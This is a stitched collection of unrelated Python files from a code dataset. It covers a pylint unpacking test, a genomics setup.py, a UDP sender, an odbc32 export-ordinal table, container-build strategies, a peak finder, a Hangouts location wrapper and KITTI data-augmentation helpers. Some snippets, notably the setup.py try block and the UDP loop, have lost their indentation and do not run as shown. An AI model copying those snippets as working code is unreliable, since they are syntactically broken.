        return self.items[item]
    def __len__(self):
        return len(self.items)
class Iter(object):
    """An iterable: __iter__ alone makes two-element unpacking valid."""
    def __iter__(self):
        for number in range(2):  # exactly two values, matching ``a, b = Iter()``
            yield number
def good_unpacking():
    """Both return paths yield a two-element sequence, so unpacking is safe."""
    if True:
        return [1, 2]
    else:
        return (3, 4)
def good_unpacking2():
    """Indirect case: forwards good_unpacking(), so still unpackable."""
    return good_unpacking()
a, b = [1, 2]
a, b = (1, 2)
a, b = set([1, 2])
a, b = {1: 2, 2: 3}
a, b = "xy"
a, b = Seq()
a, b = Iter()
a, b = (number for number in range(2))
a, b = good_unpacking()
a, b = good_unpacking2()
# Not working
class NonSeq(object):
    """Defines no sequence/iteration protocol, so unpacking it must warn."""
def bad_unpacking():
    """One return path yields None, which is not unpackable."""
    if True:
        return None  # this branch makes ``a, b = bad_unpacking()`` unsafe
    return [1, 2]
a, b = NonSeq() # [unpacking-non-sequence]
a, b = ValueError # [unpacking-non-sequence]
a, b = None # [unpacking-non-sequence]
a, b = 1 # [unpacking-non-sequence]
a, b = nonseq # [unpacking-non-sequence]
a, b = nonseq() # [unpacking-non-sequence]
a, b = bad_unpacking() # [unpacking-non-sequence]
a, b = nonseq_func # [unpacking-non-sequence]
class ClassUnpacking(object):
    """Exercise unpacking into instance attributes (self.a, self.b = ...)."""
    def test(self):
        """Valid targets first, then cases that must trigger the checker."""
        self.a, self.b = 1, 2
        self.a, self.b = {1: 2, 2: 3}
        self.a, self.b = "xy"
        self.a, c = "xy"
        c, self.a = good_unpacking()
        self.a, self.b = Iter()
        self.a, self.b = NonSeq() # [unpacking-non-sequence]
        self.a, self.b = ValueError # [unpacking-non-sequence]
        self.a, self.b = bad_unpacking() # [unpacking-non-sequence]
        self.a, c = nonseq_func # [unpacking-non-sequence]
| StarcoderdataPython |
1646706 | #
# Licensed to Big Data Genomics (BDG) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The BDG licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from setuptools import find_packages, setup
from version import version as mango_version
try: # for pip >= 10
from pip._internal.req import parse_requirements
except ImportError: # for pip <= 9.0.3
from pip.req import parse_requirements
import os
# Utility function to read the README file.
# Used for the long_description.
def read(fname):
    """Return the contents of *fname*, resolved relative to this script's directory.

    Used to feed README.md into ``long_description``.  A context manager
    closes the file promptly — the previous version leaked the handle by
    relying on garbage collection.
    """
    with open(os.path.join(os.path.dirname(__file__), fname)) as handle:
        return handle.read()
# parse_requirements() returns generator of pip.req.InstallRequirement objects
# Pin install_requires to the contents of requirements.txt.
install_reqs = parse_requirements('requirements.txt', session='hack')
# NOTE(review): ``ir.req`` is the pip<20 attribute; newer pip exposes
# ``ir.requirement`` — confirm against the pinned pip version.
reqs = [str(ir.req) for ir in install_reqs]
setup(
    name='bdgenomics.mango',
    version=mango_version,
    description='A scalable genomic visualization tool',
    author='<NAME>',
    author_email='<EMAIL>',
    url="https://github.com/bdgenomics/mango",
    install_requires=reqs,
    dependency_links=[
        'https://test.pypi.org/simple/bdgenomics-adam/'
    ],
    long_description=read('README.md'),
    packages=find_packages(exclude=['*.test.*']))
| StarcoderdataPython |
3329568 | <filename>Raspberry/old/server/old/sendSck.py
import socket, time
IPADDR = '192.168.0.192'
PORTNUM = 5000
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.getprotobyname('udp'))
addr = (IPADDR, PORTNUM)
#s.connect(addr)
while True:
print "Enviado 5 a ",addr
s.sendto(chr(5),addr)
time.sleep(1)
s.close()
| StarcoderdataPython |
149530 | <filename>o/odbc32.py
# md5 : b27c56d844ab064547d40bf4f0a96eae
# sha1 : c314e447018b0d8711347ee26a5795480837b2d3
# sha256 : c045615fe1b44a6409610e4e94e70f1559325eb55ab1f805b0452e852771c0ae
ord_names = {
1: b'SQLAllocConnect',
2: b'SQLAllocEnv',
3: b'SQLAllocStmt',
4: b'SQLBindCol',
5: b'SQLCancel',
6: b'SQLColAttributes',
7: b'SQLConnect',
8: b'SQLDescribeCol',
9: b'SQLDisconnect',
10: b'SQLError',
11: b'SQLExecDirect',
12: b'SQLExecute',
13: b'SQLFetch',
14: b'SQLFreeConnect',
15: b'SQLFreeEnv',
16: b'SQLFreeStmt',
17: b'SQLGetCursorName',
18: b'SQLNumResultCols',
19: b'SQLPrepare',
20: b'SQLRowCount',
21: b'SQLSetCursorName',
22: b'SQLSetParam',
23: b'SQLTransact',
24: b'SQLAllocHandle',
25: b'SQLBindParam',
26: b'SQLCloseCursor',
27: b'SQLColAttribute',
28: b'SQLCopyDesc',
29: b'SQLEndTran',
30: b'SQLFetchScroll',
31: b'SQLFreeHandle',
32: b'SQLGetConnectAttr',
33: b'SQLGetDescField',
34: b'SQLGetDescRec',
35: b'SQLGetDiagField',
36: b'SQLGetDiagRec',
37: b'SQLGetEnvAttr',
38: b'SQLGetStmtAttr',
39: b'SQLSetConnectAttr',
40: b'SQLColumns',
41: b'SQLDriverConnect',
42: b'SQLGetConnectOption',
43: b'SQLGetData',
44: b'SQLGetFunctions',
45: b'SQLGetInfo',
46: b'SQLGetStmtOption',
47: b'SQLGetTypeInfo',
48: b'SQLParamData',
49: b'SQLPutData',
50: b'SQLSetConnectOption',
51: b'SQLSetStmtOption',
52: b'SQLSpecialColumns',
53: b'SQLStatistics',
54: b'SQLTables',
55: b'SQLBrowseConnect',
56: b'SQLColumnPrivileges',
57: b'SQLDataSources',
58: b'SQLDescribeParam',
59: b'SQLExtendedFetch',
60: b'SQLForeignKeys',
61: b'SQLMoreResults',
62: b'SQLNativeSql',
63: b'SQLNumParams',
64: b'SQLParamOptions',
65: b'SQLPrimaryKeys',
66: b'SQLProcedureColumns',
67: b'SQLProcedures',
68: b'SQLSetPos',
69: b'SQLSetScrollOptions',
70: b'SQLTablePrivileges',
71: b'SQLDrivers',
72: b'SQLBindParameter',
73: b'SQLSetDescField',
74: b'SQLSetDescRec',
75: b'SQLSetEnvAttr',
76: b'SQLSetStmtAttr',
77: b'SQLAllocHandleStd',
78: b'SQLBulkOperations',
79: b'CloseODBCPerfData',
80: b'CollectODBCPerfData',
81: b'CursorLibLockDbc',
82: b'CursorLibLockDesc',
83: b'CursorLibLockStmt',
84: b'ODBCGetTryWaitValue',
85: b'CursorLibTransact',
86: b'ODBCSetTryWaitValue',
87: b'DllBidEntryPoint',
88: b'GetODBCSharedData',
89: b'LockHandle',
90: b'ODBCInternalConnectW',
91: b'OpenODBCPerfData',
92: b'PostComponentError',
93: b'PostODBCComponentError',
94: b'PostODBCError',
95: b'SQLCancelHandle',
96: b'SQLCompleteAsync',
97: b'SearchStatusCode',
98: b'VFreeErrors',
99: b'VRetrieveDriverErrorsRowCol',
100: b'ValidateErrorQueue',
101: b'g_hHeapMalloc',
106: b'SQLColAttributesW',
107: b'SQLConnectW',
108: b'SQLDescribeColW',
110: b'SQLErrorW',
111: b'SQLExecDirectW',
117: b'SQLGetCursorNameW',
119: b'SQLPrepareW',
121: b'SQLSetCursorNameW',
127: b'SQLColAttributeW',
132: b'SQLGetConnectAttrW',
133: b'SQLGetDescFieldW',
134: b'SQLGetDescRecW',
135: b'SQLGetDiagFieldW',
136: b'SQLGetDiagRecW',
138: b'SQLGetStmtAttrW',
139: b'SQLSetConnectAttrW',
140: b'SQLColumnsW',
141: b'SQLDriverConnectW',
142: b'SQLGetConnectOptionW',
145: b'SQLGetInfoW',
147: b'SQLGetTypeInfoW',
150: b'SQLSetConnectOptionW',
152: b'SQLSpecialColumnsW',
153: b'SQLStatisticsW',
154: b'SQLTablesW',
155: b'SQLBrowseConnectW',
156: b'SQLColumnPrivilegesW',
157: b'SQLDataSourcesW',
160: b'SQLForeignKeysW',
162: b'SQLNativeSqlW',
165: b'SQLPrimaryKeysW',
166: b'SQLProcedureColumnsW',
167: b'SQLProceduresW',
170: b'SQLTablePrivilegesW',
171: b'SQLDriversW',
173: b'SQLSetDescFieldW',
176: b'SQLSetStmtAttrW',
206: b'SQLColAttributesA',
207: b'SQLConnectA',
208: b'SQLDescribeColA',
210: b'SQLErrorA',
211: b'SQLExecDirectA',
217: b'SQLGetCursorNameA',
219: b'SQLPrepareA',
221: b'SQLSetCursorNameA',
227: b'SQLColAttributeA',
232: b'SQLGetConnectAttrA',
233: b'SQLGetDescFieldA',
234: b'SQLGetDescRecA',
235: b'SQLGetDiagFieldA',
236: b'SQLGetDiagRecA',
238: b'SQLGetStmtAttrA',
239: b'SQLSetConnectAttrA',
240: b'SQLColumnsA',
241: b'SQLDriverConnectA',
242: b'SQLGetConnectOptionA',
245: b'SQLGetInfoA',
247: b'SQLGetTypeInfoA',
250: b'SQLSetConnectOptionA',
252: b'SQLSpecialColumnsA',
253: b'SQLStatisticsA',
254: b'SQLTablesA',
255: b'SQLBrowseConnectA',
256: b'SQLColumnPrivilegesA',
257: b'SQLDataSourcesA',
260: b'SQLForeignKeysA',
262: b'SQLNativeSqlA',
265: b'SQLPrimaryKeysA',
266: b'SQLProcedureColumnsA',
267: b'SQLProceduresA',
270: b'SQLTablePrivilegesA',
271: b'SQLDriversA',
273: b'SQLSetDescFieldA',
276: b'SQLSetStmtAttrA',
301: b'ODBCQualifyFileDSNW',
} | StarcoderdataPython |
3247419 | from abc import ABC, abstractmethod
import subprocess
import semver
import requests
import container_builder.src.exceptions as exceptions
# Resolution strategies come in after a build has completed with various ways to determine
# when a pushable change has occurred
class Strategy(ABC):
    """Base class for post-build resolution strategies.

    A strategy inspects the state of a source repo after a build completes
    and decides whether/what to build and push.
    """

    def __init__(self, repo):
        # Source repository handle the strategy operates on.
        self.repo = repo

    @abstractmethod
    def execute(self, cont, **kwargs):
        """Run the strategy against container handle ``cont``.

        Subclasses receive the builder and config objects via **kwargs
        (keys ``build`` and ``config``).
        """

    @classmethod
    def validate_config(cls, config, schema):
        """Validate ``config`` against ``schema`` and return a filtered copy.

        ``schema`` maps key -> {"required": bool, "default": ...}.  A missing
        required key raises ConfigException; a missing optional key falls
        back to its default (when one is declared); keys not present in the
        schema are dropped.
        """
        new_conf = {}
        for key, spec in schema.items():
            if key in config:
                new_conf[key] = config[key]
            elif spec["required"]:
                raise exceptions.ConfigException(f"Config missing {key}")
            elif "default" in spec:
                new_conf[key] = spec["default"]
        return new_conf
class MockStrat(Strategy):
    """No-op strategy for tests and dry runs: execute() never builds."""
    def __init__(self, repo):
        super().__init__(repo)
    def execute(self, cont, **kwargs):
        # Intentionally does nothing.
        pass
class BlindBuild(Strategy):
    """Always build and push ``latest`` without consulting the source repo."""

    SCHEMA = {}

    def __init__(self, repo):
        super().__init__(repo)

    def execute(self, cont, **kwargs):
        builder = kwargs["build"]
        conf = kwargs["config"]
        latest_tag = f"{conf['repo']}:latest"
        builder.run(cont, conf, tag=latest_tag, build_repo=None, latest=True)
class Branch(Strategy):
    """Track a single git branch and rebuild ``latest`` from its tip."""

    SCHEMA = {"branch": {"required": True}}

    def __init__(self, repo):
        super().__init__(repo)

    def execute(self, cont, **kwargs):
        builder = kwargs["build"]
        conf = kwargs["config"]
        # Check out the configured branch before handing the repo to the build.
        self.repo.set_branch(conf["strategy"]["args"]["branch"])
        builder.run(
            cont,
            conf,
            tag=f"{conf['repo']}:latest",
            build_repo=self.repo.path,
            latest=True,
        )
class Tag(Strategy):
    """Build container images for local git tags missing from the registry.

    Local git tags are normalised to semver, compared against the tags
    already published on the docker registry, and every missing tag at or
    above the configured minimum version is checked out and built.
    """

    SCHEMA = {
        "force_semver": {"required": False, "default": False},
        "replace_text": {"required": False},
        "tag_prefix": {"required": False},
        "version": {"required": True},
    }

    def __init__(self, repo):
        super().__init__(repo)

    # docker container repo
    def get_remote_repo_tags(self, repo):
        """Return the registry's published tags as semver objects, newest first."""
        repo = repo.split("/")
        repo_domain = repo[0]
        del repo[0]
        repo = "/".join(repo)
        try:
            req = requests.get(f"https://{repo_domain}/v2/{repo}/tags/list")
        except requests.RequestException as error:
            # Bug fix: StrategyException lives in the exceptions module; the
            # bare name previously raised a NameError here.
            raise exceptions.StrategyException(
                f"Error grabbing remote repo tags {error}"
            )
        # deal with betas etc.
        # add in master/main/latest support
        tags = sorted(
            [
                semver.VersionInfo.parse(x.strip("v"))
                for x in req.json()["tags"]
                if x != "latest"
            ],
            reverse=True,
        )
        return tags

    def get_local_repo_tags(self, replace_text, force_semver, tag_prefix):
        """List the git repo's tags, normalised to sorted semver objects.

        Tags that cannot be parsed as semver after normalisation are
        silently discarded.
        """
        output = subprocess.run(
            "git tag",
            shell=True,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            cwd=self.repo.path,
        )
        if output.returncode != 0:
            raise exceptions.StrategyException(
                f"Something went wrong with listing tags {output.stdout}"
            )
        tags = []
        # Bug fix: decode the bytes output instead of str()-ing its repr.
        for tag in output.stdout.decode().split("\n"):
            tag = tag.strip(tag_prefix)
            if replace_text:
                tag = tag.replace(replace_text["match"], replace_text["replacement"])
            # force semver format, e.g. "1.2" -> "1.2.0"
            if force_semver and len(tag.split(".")) < 3:
                tag += ".0"
            try:
                tags.append(semver.VersionInfo.parse(tag))
            # assume there are some nonsense tags and just throw them away
            except ValueError:
                continue
        return sorted(tags, reverse=True)

    def execute(self, cont, **kwargs):
        """Build every local tag >= the configured version that is missing remotely."""
        build = kwargs["build"]
        config = kwargs["config"]
        args = config["strategy"]["args"]
        replace_text = args.get("replace_text")
        force_semver = args.get("force_semver")
        # Bug fix: the fallback branch previously assigned force_semver,
        # leaving tag_prefix undefined (NameError); default it to "v".
        tag_prefix = args.get("tag_prefix", "v")
        rmt_tags = set(self.get_remote_repo_tags(config["repo"]))
        lcl_tags = set(self.get_local_repo_tags(replace_text, force_semver, tag_prefix))
        tag_diff = sorted(lcl_tags.difference(rmt_tags), reverse=True)
        min_version = semver.VersionInfo.parse(args["version"])
        for vsn_tag in tag_diff:
            if vsn_tag < min_version:
                continue
            if replace_text:
                # Map the semver string back to the original git tag text.
                repo_tag = str(vsn_tag).replace(
                    replace_text["replacement"], replace_text["match"]
                )
                if force_semver:
                    # Undo the ".0" padding added during normalisation.
                    # Bug fix: only applies when replace_text is configured;
                    # previously this crashed subscripting None.
                    repo_tag = repo_tag.strip(f'{replace_text["match"]}0')
            else:
                repo_tag = vsn_tag
            self.repo.set_branch(f"{tag_prefix}{repo_tag}")
            # Only the newest missing tag is also pushed as "latest".
            build.run(
                cont,
                config,
                tag=f"{config['repo']}:{vsn_tag}",
                build_repo=self.repo.path,
                latest=tag_diff.index(vsn_tag) == 0,
            )
# extra references for config file
# (snake_case aliases so strategies can be named directly in YAML/JSON config)
track_branch = Branch
track_tag = Tag
blind_build = BlindBuild
| StarcoderdataPython |
1724750 | # -*- coding: utf-8 -*-
"""
Created on Fri Nov 17 13:30:25 2017
@author: similarities
"""
import numpy as np
import Tkinter, tkFileDialog
import ntpath
import matplotlib.pyplot as plt
# Hide the Tk root window so only the file-open dialog appears.
root = Tkinter.Tk()
root.withdraw()
ntpath.basename("a/b/c")  # NOTE(review): result unused -- leftover smoke test?
file_path = tkFileDialog.askopenfilename()
#open(file_path)
def path_leaf(path):
    """Return the final path component, even when *path* ends in a separator."""
    directory, leaf = ntpath.split(path)
    return leaf if leaf else ntpath.basename(directory)
print(path_leaf(file_path))
class Max_Min:
    """Find local maxima and minima in a two-column (x, y) text data file.

    NOTE: this is Python 2 code (print statements, Tkinter spelling).
    """
    def __init__(self, file_path):
        self.file_path = file_path
        # Accumulators for detected extrema.  NOTE(review): np.empty leaves
        # one uninitialized (garbage) row that ends up in the output arrays.
        self.array_min = np.empty([1, 2])
        self.array_max = np.empty([1, 2])
        # NOTE(review): placeholder is the np.array *function*, not an array;
        # loadarray() must run before peak_detect().
        self.raw_data = np.array
    def loadarray(self):
        """Load the two data columns, sort by x, plot and return them."""
        #reads coloumn1 from txt / skips first rows (3),
        liste1 = np.loadtxt(self.file_path, skiprows = (3), usecols = (0,))
        #reads coloumn2 from txt / skips first rows (3),
        liste = np.loadtxt(self.file_path, skiprows = (3), usecols = (1,))
        #converts loaded coloumn1 to an numpy array:
        matrix1 = np.array((liste1))
        #converts loaded coloumn2 to an numpy array:
        aa = np.array((liste))
        #joins the arrays into a 2xN array
        self.raw_data = np.column_stack((matrix1, aa))
        # In-place sort on the first column via a structured-array view.
        self.raw_data.view('i8,i8').sort(order = ['f0'], axis = 0)
        #print submatrix1
        plot_xy(self.raw_data, "b", "rawdata")
        return self.raw_data
    def peak_detect(self):
        """Classify each interior point as a local max, local min, or neither."""
        i = 1
        N = len(self.raw_data)
        #peak_min = np.empty([1, 2])
        peak = np.empty([1, 2])
        #peak_max = np.empty([1, 2])
        while i < N-1:
            # Slopes toward the next and the previous sample.
            delta_1 = self.raw_data[i+1, 1]-self.raw_data[i, 1]
            delta_2 = self.raw_data[i-1, 1]-self.raw_data[i, 1]
            if delta_1 < 0 and delta_2 > 0:
                None
            elif delta_1 > 0 and delta_2 < 0:
                None
            elif delta_1 < 0 and delta_2 < 0:
                # Both neighbours lower -> local maximum... NOTE(review):
                # this branch appends to array_min; labels look swapped
                # relative to the geometry -- confirm intent.
                #make new array and mark points
                peak[0, 0] = self.raw_data[i, 0]
                peak[0, 1] = self.raw_data[i, 1]
                self.array_min= np.concatenate((peak,self.array_min))
            elif delta_1 > 0 and delta_2 > 0:
                #make new array and mark points
                peak[0, 0] = self.raw_data[i, 0]
                peak[0, 1] = self.raw_data[i, 1]
                self.array_max = np.concatenate((peak, self.array_max))
            else:
                # Flat neighbourhood (equal values): not classified.
                print "equal?", delta_1, delta_2
            i=i+1
        # info:
        print "number of raw data points:", len(self.raw_data)
        print "number of maxima:", len(self.array_max)
        print "number of minima:", len(self.array_min)
        plot_xy(self.array_max, "r", "max" )
        plot_xy(self.array_min, "y", "min")
        print_to_file(self.array_min, "picked_Minimum")
        print_to_file(self.array_max, "picked_Maximum")
        return self.array_max, self.array_min
# global functions:
def plot_xy(array, color, name):
    """Scatter-plot column 0 vs column 1 of *array* and show the figure."""
    xs = array[:, 0]
    ys = array[:, 1]
    handle = plt.scatter(xs, ys, color = color, label = name)
    plt.legend(handles = [handle])
    plt.ylabel(name)
    plt.show()
def print_to_file(array,name):
    # Dump the array to a tab-separated text file named "test_<name>.txt"
    # using scientific notation, then return the array unchanged.
    print "now to file"
    np.savetxt("test" + "_" + name + ".txt", array[:], fmt = '%.3E', delimiter = '\t')
    return array
# Script driver: load the selected data file, then detect/plot/save extrema.
my_filter = Max_Min(file_path)
my_filter.loadarray()
# including the plot and print call here -- might be done in a nicer way outside
my_filter.peak_detect()
| StarcoderdataPython |
3335829 | from hangups.hangouts_pb2 import Location as HangupsLocation, ItemType
from hangups.hangouts_pb2 import Place, EmbedItem
import hangups
from hanger.abc import HangupsObject
class Location(HangupsObject):
    """A geographic place that can be attached to a Hangouts message."""
    def __init__(self, name, address, latitude, longitude, url=None, image_url=None):
        self.name = name
        self.address = address
        self.longitude = longitude
        self.latitude = latitude
        # Optional: link for the place and a preview image URL.
        self.url = url
        self.image_url = image_url
    def _build_hangups_object(self):
        # Translate this object into the hangups protobuf Location message:
        # a Place embedding the postal address, geo coordinates, and an
        # optional representative image.
        return HangupsLocation(
            place=Place(
                url=self.url,
                name=self.name,
                address=EmbedItem(
                    postal_address=hangups.hangouts_pb2.EmbedItem.PostalAddress(
                        street_address=self.address
                    )
                ),
                geo=EmbedItem(
                    geo_coordinates=hangups.hangouts_pb2.EmbedItem.GeoCoordinates(
                        latitude=self.latitude,
                        longitude=self.longitude
                    )
                ),
                representative_image=EmbedItem(
                    image=hangups.hangouts_pb2.EmbedItem.Image(
                        url=self.image_url
                    )
                )
            )
        )
| StarcoderdataPython |
1779970 | """Miscellaneous utility functions."""
from functools import reduce
import cv2, os
from PIL import Image
import numpy as np
from matplotlib.colors import rgb_to_hsv, hsv_to_rgb
def compose(*funcs):
    """Compose arbitrarily many functions, evaluated left to right.

    compose(f, g)(x) == g(f(x)).  Raises ValueError when called with no
    functions, since no identity element is defined here.
    Reference: https://mathieularose.com/function-composition-in-python/
    """
    if not funcs:
        raise ValueError('Composition of empty sequence not supported.')
    return reduce(lambda f, g: lambda *a, **kw: g(f(*a, **kw)), funcs)
def letterbox_image(image, size):
    """Resize *image* to *size* with unchanged aspect ratio, padding with gray.

    *size* is (width, height); the scaled image is centered on a
    (128, 128, 128) canvas.  Returns a new PIL image.
    """
    iw, ih = image.size
    w, h = size
    scale = min(w * 1.0 / iw, h * 1.0 / ih)
    nw = int(iw * scale)
    nh = int(ih * scale)
    # Bug fix: removed the debug print and the blocking new_image.show()
    # call, which popped an image viewer on every invocation.
    image = image.resize((nw, nh), Image.BICUBIC)
    new_image = Image.new('RGB', size, (128, 128, 128))
    new_image.paste(image, ((w - nw) // 2, (h - nh) // 2))
    return new_image
def rand(a=0, b=1):
    """Return a uniform random float in the half-open interval [a, b)."""
    return a + (b - a) * np.random.rand()
VEHICLES = ['Car', 'Truck', 'Van', 'Tram','Pedestrian','Cyclist']
VEHICLESNUM = [0, 1, 2, 3, 4, 5]
BIN, OVERLAP = 2, 0.1
def compute_anchors(angle):
    """Map *angle* (radians) onto its overlapping orientation bin(s).

    Returns a list of [bin_index, residual_angle] pairs; an angle near a
    bin boundary lands in both neighbouring bins because of OVERLAP.
    """
    wedge = 2. * np.pi / BIN
    lower = int(angle / wedge)
    upper = lower + 1
    half_span = wedge / 2 * (1 + OVERLAP / 2)
    anchors = []
    if angle - lower * wedge < half_span:
        anchors.append([lower, angle - lower * wedge])
    if upper * wedge - angle < half_span:
        anchors.append([upper % BIN, angle - upper * wedge])
    return anchors
def kitti_parse_annotation(label_dir, image_dir):
    """Parse KITTI label files into per-image object lists for training.

    For every label file in *label_dir*, collects the matching image path,
    2D box, 3D dimensions and ray-corrected orientation for each object of
    a known class.  Dimensions are re-centred on the running per-class mean,
    and per-BIN orientation/confidence targets are computed for both the
    original and the horizontally flipped image.
    """
    image_num = 0
    all_image_objs = []
    # Running mean of 3D dimensions per class id, updated incrementally.
    dims_avg = {key:np.array([0, 0, 0]) for key in VEHICLESNUM}
    dims_cnt = {key:0 for key in VEHICLESNUM}
    for label_file in sorted(os.listdir(label_dir)):
        all_objs = []
        image_file = label_file.replace('txt', 'png')
        for line in open(label_dir + label_file).readlines():
            line = line.strip().split(' ')
            # NOTE(review): truncation/occlusion are parsed but the filter
            # below is commented out, so they are currently unused.
            truncated = np.abs(float(line[1]))
            occluded = np.abs(float(line[2]))
            if line[0] in VEHICLES:
            #and truncated < 0.6 and occluded < 0.6:
                # Shift observation angle by pi/2 and wrap into [0, 2*pi).
                new_alpha = float(line[3]) + np.pi/2.
                if new_alpha < 0:
                    new_alpha = new_alpha + 2.*np.pi
                # if line[0]=='Pedestrian' or line[0]=='Cyclist':#mod only car orient
                #     new_alpha = 0.0
                new_alpha = new_alpha - int(new_alpha/(2.*np.pi))*(2.*np.pi)
                # if line[0]=='Pedestrian' or line[0]=='Cyclist':#mod only car orient
                #     new_alpha = 0.0
                obj = {'name': VEHICLES.index(line[0]),
                       'image':image_dir+image_file,
                       'xmin':int(float(line[4])),
                       'ymin':int(float(line[5])),
                       'xmax':int(float(line[6])),
                       'ymax':int(float(line[7])),
                       'dims':np.array([float(number) for number in line[8:11]]),
                       'new_alpha': new_alpha
                       }
                # Incremental mean update: avg = (cnt*avg + dims) / (cnt+1).
                dims_avg[obj['name']] = dims_cnt[obj['name']]*dims_avg[obj['name']] + obj['dims']
                dims_cnt[obj['name']] += 1
                dims_avg[obj['name']] /= dims_cnt[obj['name']]
                all_objs.append(obj)
        #print("objs len %d", len(all_objs))
        #print(all_objs)
        if len(all_objs)== 0:
            continue
        #print(all_objs)
        all_image_objs.append(all_objs)
        #all_objs.clear()
        image_num += 1
    #print(all_image_objs)
    ###### flip data
    for image_objs in all_image_objs:
        #print(len(image_objs))
        for obj in image_objs:
            # Fix dimensions: store the offset from the class-mean size.
            obj['dims'] = obj['dims'] - dims_avg[obj['name']]
            # Fix orientation and confidence for no flip
            orientation = np.zeros((BIN,2))
            confidence = np.zeros(BIN)
            anchors = compute_anchors(obj['new_alpha'])
            for anchor in anchors:
                orientation[anchor[0]] = np.array([np.cos(anchor[1]), np.sin(anchor[1])])
                confidence[anchor[0]] = 1.
            confidence = confidence / np.sum(confidence)
            obj['orient'] = orientation
            obj['conf'] = confidence
            # Fix orientation and confidence for flip (mirrored angle).
            orientation = np.zeros((BIN,2))
            confidence = np.zeros(BIN)
            anchors = compute_anchors(2.*np.pi - obj['new_alpha'])
            for anchor in anchors:
                orientation[anchor[0]] = np.array([np.cos(anchor[1]), np.sin(anchor[1])])
                confidence[anchor[0]] = 1
            confidence = confidence / np.sum(confidence)
            obj['orient_flipped'] = orientation
            obj['conf_flipped'] = confidence
    return all_image_objs
def get_random_data(image_objs, input_shape, random=True, max_boxes=100, jitter=.2, hue=.1, sat=1.5, val=1.5, proc_img=True):
    '''random preprocessing for real-time data augmentation

    Loads the image shared by *image_objs* and builds a (max_boxes, 14)
    target array: box(4) + class(1) + dims(3) + BIN confidences + BIN
    orientation pairs.  With random=True applies jitter/flip/HSV
    augmentation.

    NOTE(review): the two branches return different tuples --
    (image_data, box_data) when random is False but
    (image, image_data, box_data, picname) when True -- confirm callers
    handle both shapes.
    '''
    obj_cnt = 0
    h, w = input_shape
    #box = np.array([np.array(list(map(int,box.split(',')))) for box in line[1:]])
    # box 4 cls 1 dim 3 orient BIN*2 confidence BIN
    box = np.zeros((len(image_objs), 5+3+BIN*2+BIN))
    # torient holds [conf, orients] for normal and flipped variants side by side.
    torient = np.zeros((len(image_objs), (2+1)*2*BIN))
    #print(len(image_objs))
    #print(image_objs)
    for obj in image_objs:
        if obj_cnt == 0:
            # All objs in the list belong to the same image; open it once.
            image = Image.open(obj['image'])
            picname = obj['image'][-10:]
            iw, ih = image.size
        box[obj_cnt, 0] = obj['xmin']
        box[obj_cnt, 1] = obj['ymin']
        box[obj_cnt, 2] = obj['xmax']
        box[obj_cnt, 3] = obj['ymax']
        box[obj_cnt, 4] = int(obj['name'])
        box[obj_cnt, 5:8] = obj['dims'][0:3]
        # box[obj_cnt, 5] = obj['dims'][0] - dims_avg[obj['name']][0]
        # box[obj_cnt, 6] = obj['dims'][1] - dims_avg[obj['name']][1]
        # box[obj_cnt, 7] = obj['dims'][2] - dims_avg[obj['name']][2]
        for bini in range(BIN):
            torient[obj_cnt, bini] = obj['conf'][bini]
            torient[obj_cnt, BIN+bini*2] = obj['orient'][bini][0]
            torient[obj_cnt, BIN+bini*2+1] = obj['orient'][bini][1]
            torient[obj_cnt, BIN*3+bini] = obj['conf_flipped'][bini]
            torient[obj_cnt, BIN*4+bini*2] = obj['orient_flipped'][bini][0]
            torient[obj_cnt, BIN*4+bini*2+1] = obj['orient_flipped'][bini][1]
        obj_cnt += 1
    #print(box)
    if not random:
        # Deterministic path: letterbox-resize and rescale the boxes.
        # resize image
        scale = min(w/iw, h/ih)
        nw = int(iw*scale)
        nh = int(ih*scale)
        dx = (w-nw)//2
        dy = (h-nh)//2
        image_data=0
        if proc_img:
            image = image.resize((nw,nh), Image.BICUBIC)
            new_image = Image.new('RGB', (w,h), (128,128,128))
            new_image.paste(image, (dx, dy))
            image_data = np.array(new_image)/255.
        # correct boxes
        box_data = np.zeros((max_boxes,5+(2+1)*BIN+3))
        if len(box)>0:
            box[:, 8:] = torient[:, :BIN*3]
            np.random.shuffle(box)
            if len(box)>max_boxes: box = box[:max_boxes]
            box[:, [0,2]] = box[:, [0,2]]*scale + dx
            box[:, [1,3]] = box[:, [1,3]]*scale + dy
            box_data[:len(box)] = box
        return image_data, box_data
    # Augmentation path: random aspect-ratio/scale jitter, placement, flip.
    # resize image
    #print('w %d h %d', iw, ih)
    new_ar = w/h * rand(1-jitter,1+jitter)/rand(1-jitter,1+jitter)
    scale = rand(.8, 1.2)
    if new_ar < 1:
        nh = int(scale*h)
        nw = int(nh*new_ar)
    else:
        nw = int(scale*w)
        nh = int(nw/new_ar)
    image = image.resize((nw,nh), Image.BICUBIC)
    # place image
    dx = int(rand(0, w-nw))
    dy = int(rand(0, h-nh))
    new_image = Image.new('RGB', (w,h), (128,128,128))
    new_image.paste(image, (dx, dy))
    image = new_image
    # flip image or not
    flip = rand()<.5
    if flip: image = image.transpose(Image.FLIP_LEFT_RIGHT)
    # distort image in HSV space, then clamp back into [0, 1]
    hue = rand(-hue, hue)
    sat = rand(1, sat) if rand()<.5 else 1/rand(1, sat)
    val = rand(1, val) if rand()<.5 else 1/rand(1, val)
    x = rgb_to_hsv(np.array(image)/255.)
    x[..., 0] += hue
    x[..., 0][x[..., 0]>1] -= 1
    x[..., 0][x[..., 0]<0] += 1
    x[..., 1] *= sat
    x[..., 2] *= val
    x[x>1] = 1
    x[x<0] = 0
    image_data = hsv_to_rgb(x) # numpy array, 0 to 1
    # correct boxes: rescale, mirror when flipped, clip to the canvas.
    box_data = np.zeros((max_boxes,5+(2+1)*BIN+3))
    if len(box)>0:
        box[:, [0,2]] = box[:, [0,2]]*nw/iw + dx
        box[:, [1,3]] = box[:, [1,3]]*nh/ih + dy
        if flip:
            box[:, [0,2]] = w - box[:, [2,0]]
            # Use the flipped orientation/confidence targets.
            box[:, 8:] = torient[:, BIN*3:]
        else:
            box[:, 8:] = torient[:, :BIN*3]
        box[:, 0:2][box[:, 0:2]<0] = 0
